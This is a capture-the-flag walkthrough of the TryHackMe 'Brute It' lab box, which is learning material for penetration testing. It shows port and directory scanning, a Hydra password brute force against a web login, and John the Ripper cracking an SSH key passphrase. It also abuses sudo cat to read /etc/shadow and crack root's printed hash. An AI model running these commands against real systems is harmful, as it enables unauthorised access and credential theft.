4 minutes
THM: Brute It
Title:Brute It
Description:Learn how to brute, hash cracking and escalate privileges in this box!
Difficulty:Easy
Tags:
Nmap
First we scan for open ports
# nmap -p- -T4 -sV -sC 10.10.125.81 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 19:29 BST
Nmap scan report for 10.10.125.81
Host is up (0.020s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:0e:bf:14:fa:54:b3:5c:44:15:ed:b2:5d:a0:ac:8f (RSA)
| 256 d0:3a:81:55:13:5e:87:0c:e8:52:1e:cf:44:e0:3a:54 (ECDSA)
|_ 256 da:ce:79:e0:45:eb:17:25:ef:62:ac:98:f0:cf:bb:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.68 seconds
Website
We can see a website is running however there is just a standard apache holding page, so we run a gobuster scan to find any other directories
# gobuster dir -u http://10.10.125.81 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.125.81
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 277]
/admin (Status: 301) [Size: 312] [--> http://10.10.125.81/admin/]
/.htaccess (Status: 403) [Size: 277]
/.hta (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 10918]
/server-status (Status: 403) [Size: 277]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
Looking at the admin directory we see a login box and looking at the website source it tells us the username
We dont have the password though, so we can try brute forcing it with hydra
# hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.125.81 http-post-form '/admin/index.php:user=^USER^&pass=^PASS^:F=<p>Username or password invalid</p>'
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-08-02 19:56:09
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.125.81:80/admin/index.php:user=^USER^&pass=^PASS^:F=<p>Username or password invalid</p>
[80][http-post-form] host: 10.10.125.81 login: admin password: ******
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-08-02 19:56:21
With the discovered password we are able to login. This reveals a flag and gives us a RSA private key for john which we can download.
SSH
The key we downloaded is password protected, so in order to use it we will need to crack the password. We extract the hash and crack it with john.
# ssh2john id_rsa > id_rsa.hash
# john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
********** (id_rsa)
1g 0:00:00:00 DONE (2025-08-02 20:03) 25.00g/s 1815Kp/s 1815Kc/s 1815KC/s saloni..rock14
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
With this password we can login as john using the key and get the user flag
# ssh john@10.10.125.81 -i id_rsa
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-118-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat Aug 2 19:05:00 UTC 2025
System load: 0.0 Processes: 109
Usage of /: 25.7% of 19.56GB Users logged in: 0
Memory usage: 21% IP address for ens5: 10.10.125.81
Swap usage: 0%
63 packages can be updated.
0 updates are security updates.
Last login: Wed Sep 30 14:06:18 2020 from 192.168.1.106
john@bruteit:~$ ls
user.txt
john@bruteit:~$ cat user.txt
THM{a*************************r}
Privilege escalation
Checking john’s privileges we see they can execute cat with sudo permissions and no password. This means we can simply cat out the root flag
john@bruteit:~$ sudo -l
Matching Defaults entries for john on bruteit:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on bruteit:
(root) NOPASSWD: /bin/cat
john@bruteit:~$ sudo cat /root/root.txt
THM{p******************n}
However we are also asked for root’s password. Using cat again, we can get the password file and crack the hash to reveal their password
john@bruteit:~$ sudo cat /etc/shadow
root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7:::
...
...
# john root.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
f******l (root)
1g 0:00:00:00 DONE (2025-08-02 20:13) 11.11g/s 2844p/s 2844c/s 2844C/s 123456..freedom
Use the "--show" option to display all of the cracked passwords reliably
Session completed.